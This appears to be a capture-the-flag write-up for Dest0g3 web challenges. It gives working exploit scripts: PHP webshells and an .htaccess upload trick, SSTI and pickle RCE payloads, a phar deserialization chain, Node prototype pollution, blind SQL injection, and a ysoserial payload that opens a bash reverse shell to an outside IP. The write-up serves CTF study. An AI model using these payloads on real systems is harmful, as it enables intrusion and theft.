Web
phpdest
require_once限制了只能包含一次
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
得到的内容base64解码即可
EasyPHP
set_error_handler
设置成了打印flag的函数
传一个数组让他报错就行了
SimpleRCE
aaa=show_source(str_rot13('/synt'));
funny_upload
php > echo base64_encode('<?php eval($_POST[0]);?>');
PD9waHAgZXZhbCgkX1BPU1RbMF0pOz8+
上传shell.png 内容就是这一串base64
然后上传.htaccess
AddType application/x-httpd-php .png
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/uploads/c47b21fcf8f0bc8b3920541abd8024fd/shell.png"
或者
import socket
import string
import requests
import time
def send(flag,length):
    """Upload a .htaccess whose ``<If>`` condition tests *flag* against /flag.

    The request is written by hand over a raw TCP socket so the multipart body
    goes out byte-for-byte as spelled below.  *length* is sent verbatim as
    Content-Length (it is not computed from the body), so the caller has to
    keep it in step with the size of *flag*.  The reply is never read and the
    socket is never closed explicitly.  Host, boundary and Cookie values are
    fixed to the author's target instance.
    """
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn",81))
    # The literal uses plain "\n" line ends.  They are first replaced by the
    # two-character text \r\n, which is then used as the split marker, and a
    # real CRLF is appended to every piece as it is sent.  The lines inside the
    # literal are wire bytes and must stay at column 0.
    data = f'''POST / HTTP/1.1
Host: 2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11586810801148743996859451927
Content-Length: {length}
Origin: http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81
Connection: close
Referer: http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81/
Cookie: token=eyJhZG1pbiI6dHJ1ZX0.YBEFFA._EzwGG57OrghZrI9PTJv5uNm0hI
Upgrade-Insecure-Requests: 1
-----------------------------11586810801148743996859451927
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/png
<If "file('/flag')=~ /{flag}/">
ErrorDocument 404 "xux"
</If>
-----------------------------11586810801148743996859451927
Content-Disposition: form-data; name="1"
提交查询
-----------------------------11586810801148743996859451927--'''.replace('''
''','\\r\\n').split("\\r\\n")
    for i in data:
        temp = (i+"\r\n").encode()
        # socket.send() may deliver fewer bytes than given; sendall() would be
        # the complete variant.  Nothing checks the return value here.
        s.send(temp)
length = 400   # Content-Length for the first probe; bumped by one whenever flag grows by one byte
d = string.digits + string.ascii_lowercase + r"_-{}" + string.ascii_uppercase   # candidate alphabet, tried in this order
flag = "Dest0g3{"   # known prefix
# Indentation was lost in extraction; the sleep is placed in the inner loop
# here (one pause per probe).  `i` is unused: if no candidate matches, the
# next outer iteration simply retries the same prefix.
for i in range(100):
    for t in d:
        send(flag+t,length)
        # The uploaded .htaccess defines ErrorDocument 404 "xux" only inside
        # its <If>, so a 404 for the non-existent `aaa` path carries "xux"
        # exactly when the <If> regex matched the probed prefix.
        rep = requests.get("http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/aaa").text
        if 'xux' in rep:
            flag+=t
            length+=1   # keeps the hand-written Content-Length in sync with the longer body
            print(flag)
            break
        time.sleep(0.1)
EasySSTI
import requests
import re
url = "http://3fbb08f6-c806-4246-8e4c-b82d6b89a704.node4.buuoj.cn:81/login"   # the payload is submitted as the username field
# Author's key for the template variables set below:
#a=pop
#b=_
#c=__globals__
#d=getitems
#e=os
#f=
#g=/
#flag=cat /flag
# The {%set%} chain builds those strings without any quote character: dict
# keys joined by |join give the words, and lipsum|string|list|attr(a)(N) pops
# single characters out of the text form of the lipsum helper.  `z` is set
# but never used, and the `re` import is unused in this script.
payload = '''{%set
a=dict(po=aa,p=aa)|join%}{%set
b=lipsum|string|list|attr(a)(18)%}{%set
c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set
d=(b,b,dict(ge=cc,tit=dd,em=aa)|join,b,b)|join%}{%set
e=dict(o=cc,s=aa)|join%}{%set
f=lipsum|string|list|attr(a)(9)%}{%set
g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-8)%}{%set
flag=(dict(cat=aa)|join,f,g,dict(flag=aa)|join)|join%}{%set
h=(a,dict(en=aa)|join|join)|join%}{%set
i=dict(re=aa,ad=aa)|join%}{%set
z=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-5)%}{{lipsum|attr(c)|attr(d)(e)|attr(h)(flag)|attr(i)()}}'''
print(payload)   # echoed locally; the server's rendering is printed below
data = {
    "username":payload,
    "password":"xux"
}
rep = requests.post(url=url,data=data).text
print(rep)
middle
写opcode,比较简单,往栈中压一个列表即可
import pickle
import pickletools
import base64
import requests
# poc = '__import__("os").system("whoami")'
# Hand-written pickle in the protocol-0 text form; pickletools.dis below prints
# the same breakdown:
#   c config\nbackdoor   GLOBAL  -> push config.backdoor
#   (]                   MARK, then an empty list
#   V...\n               a unicode string
#   a                    APPEND the string to the list
#   t                    TUPLE   -> ([string],)
#   R                    REDUCE  -> config.backdoor([string])
#   .                    STOP
# i.e. the server-side unpickle ends up calling config.backdoor with a
# one-element list (what backdoor does with it is not visible here).
poc = b'''cconfig
backdoor
(]V__import__("os").popen("cat /flag.txt").read()
atR.'''
pickletools.dis(poc)             # sanity-check the opcode stream locally before sending
payload = base64.b64encode(poc)  # bytes; requests form-encodes the value as-is
print(payload)
rep = requests.post(url="http://2e0225b1-77e1-4b0c-8508-2b6b1b70bb4f.node4.buuoj.cn:81/home",data={"data":payload})
print(rep.text)
PharPOP
<?php
/**
 * Root of the object graph stored as the phar's metadata (see setMetadata below).
 * The generator assigns an apple instance to $name; $act is never set here.
 */
class tree{
    public $name;
    public $act;
}
/**
 * Declares no properties; the script below attaches $flag and $xxx as
 * dynamic properties (allowed on plain classes, deprecated since PHP 8.2).
 */
class apple{
}
/**
 * $p starts out null; the script assigns $air->p->act, which relies on PHP
 * auto-creating a stdClass for $p (a warning on PHP 7, an Error on PHP 8 --
 * confirm against the PHP version used to run this generator).
 */
class air{
    public $p;
}
// Object graph: tree { name = apple { flag = "/fflaggg", xxx = air { p->act = "SplFileObject" } } }
$tree = new tree();
$air = new air();
$air->p->act = "SplFileObject";   // auto-vivifies $air->p (see class air)
$apple = new apple();
$apple->flag = "/fflaggg";        // dynamic property, not declared on apple
$tree->name = $apple;
$apple->xxx = $air;               // dynamic property
echo serialize($tree);            // printed for inspection only; the phar carries its own copy
// Build exp.phar: minimal stub, the object graph as metadata, one dummy entry.
// Writing a phar needs phar.readonly=0 in php.ini.
$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($tree);        // serialized into the phar manifest
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
运行得到exp.phar
将2改为3来绕过throw new Error("start");
修改了phar文件后还要改一下签名
from hashlib import sha1
# Re-sign exp.phar after the manual edit described above.  The file ends with a
# 20-byte SHA-1 over everything before it, followed by 8 trailing bytes
# (presumably the signature flags and magic of the phar format) that are kept
# as they are.
f = open("exp.phar",'rb').read()          # whole archive; the handle is never closed explicitly
s = f[:-28]                               # content covered by the signature (20 + 8 bytes stripped)
h = f[-8:]                                # trailer reused verbatim
newf = s + sha1(s).digest() + h           # fresh digest spliced between content and trailer
open("test.phar",'wb').write(newf)        # written as test.phar; exp.phar is left untouched
得到test.phar
因为waf有对传入的数据进行检测,过滤了php
使用gzip对test.phar压缩一次
最终exp:
import requests
import re
url = "http://f7049b15-42dc-4336-b4a4-5c45454778f7.node4.buuoj.cn:81/"   # target instance, shared by send() and hack()
def send():
    """Upload test.phar.gz as form field "0" and print the response body.

    Field "1" carries a serialized ``D`` object with start="w".  NOTE(review):
    its declared property count (10) does not match the single property
    present -- check whether that is intentional for the target's unserialize
    handling; can't tell from here.  The gzip file is read without closing
    the handle explicitly.
    """
    rep = requests.post(url=url,data={
        "1":'O:1:"D":10:{s:5:"start";s:1:"w";}',
        '0':open("test.phar.gz",'rb').read()
    }).text
    print(rep)
def hack(file):
    """POST *file* as field "0" with start="r" and print the first Dest0g3{...} match.

    Assumes the response contains a flag: ``re.findall(...)[0]`` raises
    IndexError when there is no match.
    """
    rep = requests.post(url=url,data = {
        "1":'O:1:"D":10:{s:5:"start";s:1:"r";}',
        "0":file
    }).text
    flag = re.findall(r"Dest0g3{.*?}",rep)[0]
    print(flag)
#send()
#/tmp/915fa1e9fb473b8e2aff23ab61aa857a.jpg
# send() was run once and is now commented out; the path above is where the
# upload landed.  It is reopened through the phar:// wrapper so the metadata
# produced by the PHP generator is parsed server-side.
hack("phar:///tmp/915fa1e9fb473b8e2aff23ab61aa857a.jpg")
ezip
新建一个shell.zip,其中含有一个1.php以及空的1.txt
1.php的内容为
<?php
// 1.php, the file placed inside shell.zip as described above.
eval($_POST[0]);
?>
打开010editor
将1.txt改为/////
上传shell.zip,提示解压失败,但1.php已经被解压
看了一下没权限读flag
NodeSoEasy
污染escapeFn
即可
{"__proto__":{"client":true,"escapeFunction":"1; return global.process.mainModule.constructor._load('fs').readFileSync('/flag');","compileDebug":true}}
Really Easy SQL
import requests
import time
import string
url = "http://xxxxxx/index.php"   # placeholder host left by the author
flag = "Dest0g3{"                 # known prefix; positions up to len(flag) are not queried
# Time-based blind extraction, one byte per outer iteration: each request asks
# the database to compare the byte at position i with `mid`; the injected
# benchmark() only runs when the comparison holds, so a reply slower than 1 s
# is read as "greater".  Binary search over 32..127 costs about seven requests
# per byte.
for i in range(len(flag)+1,100):
    max = 127   # NOTE: shadows the builtins max/min for the rest of the loop
    min = 32
    while(abs(max-min)>0):   # i.e. while max != min
        mid = (max+min)//2
        data = {
            #"username":f"admin',if((select(ascii(mid((group_concat(table_name)),{i},1)))from(information_schema.tables)where(table_schema=database()))>{mid},benchmark(100000,sha(1)),1))#",
            #"username":f"admin',if((select(ascii(mid((group_concat(column_name)),{i},1)))from(information_schema.columns)where(table_name='flaggg'))>{mid},benchmark(100000,sha(1)),1))#",
            "username":f"admin',if((select(ascii(mid((group_concat(cmd)),{i},1)))from(flaggg))>{mid},benchmark(900000,sha(1)),1))#",
            "password":"admin"
        }
        d1 = time.time()
        # Every request is routed through a local proxy on 127.0.0.1:8080, so
        # the measured time includes the proxy's own latency.
        requests.post(url=url,data=data,proxies={"http":"127.0.0.1:8080"})
        d2 = time.time()
        if d2-d1>1:
            min = mid + 1   # byte > mid
        else:
            max = mid       # byte <= mid
        time.sleep(0.5)
    flag+=chr(max)   # min == max here
    print(flag)
easysql
跟前一题的区别好像是多过滤了大于和小于号
把脚本改一下
import requests
import time
import string
url = "http://xxxxxx/index.php"   # placeholder host left by the author
s = string.digits + string.ascii_lowercase + "-}{"   # candidate alphabet
ss = [ord(i) for i in s]                               # compared as ordinals, since only `=` is usable here (see note above)
flag = "Dest0g3{8be"                                   # prefix already recovered
# Equality-only variant of the previous script: one request per candidate byte
# and position, a reply slower than 2 s marks a hit.  There is no break after a
# hit, so the remaining candidates for that position are still sent; and when
# nothing matches, the position is silently skipped in the printed string.
for i in range(len(flag)+1,100):
    for t in ss:
        data = {
            "username":f"admin',if((select(ascii(mid((group_concat(cmd)),{i},1)))from(flaggg))={t},benchmark(900000,sha(1)),1))#",
            "password":"admin"
        }
        d1 = time.time()
        requests.post(url=url,data=data,proxies={"http":"127.0.0.1:8080"})   # via a local proxy; its latency is included
        d2 = time.time()
        if d2-d1>2:
            flag+=chr(t)
            print(flag)
        time.sleep(0.5)
跑了半天QwQ
EzSerial
user处的数据是java序列化后的数据的base64编码后的结果
推测在user处传入的数据会被base64解码后反序列化
import requests
import os
import base64
url = "http://9c8254ad-4ea0-43ba-88a0-51a12b53ce9c.node4.buuoj.cn:81/admin/index.jsp"
# Gadget-chain names passed to ysoserial: CommonsCollections1 .. CommonsCollections7.
payloadlist = []
for i in range(1,8):
    payloadlist.append(f"CommonsCollections{i}")
for payload in payloadlist:
    # `payload` is rebound from the chain name to a full shell command line,
    # assembled by string concatenation and run through os.system; the jar is
    # expected in the working directory and its output is redirected to ./payload.
    payload = 'java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ' + payload + ' "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Mi4xOTIuNDIuNDgvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}" > payload'
    os.system(payload)
    # The serialized object is read back (handle left to the GC), base64-encoded
    # and sent as the `user` cookie -- the value the prose above infers is
    # base64-decoded and deserialized server-side.  JSESSIONID is a fixed
    # session id from the author's run.
    exp = base64.b64encode(open("payload",'rb').read()).decode()
    print(exp)
    rep = requests.get(url=url,cookies={
        "JSESSIONID":"CB0DE07D94F9C047F6D52BCEE88A73E8",
        "user":exp
    }).text   # assigned but never inspected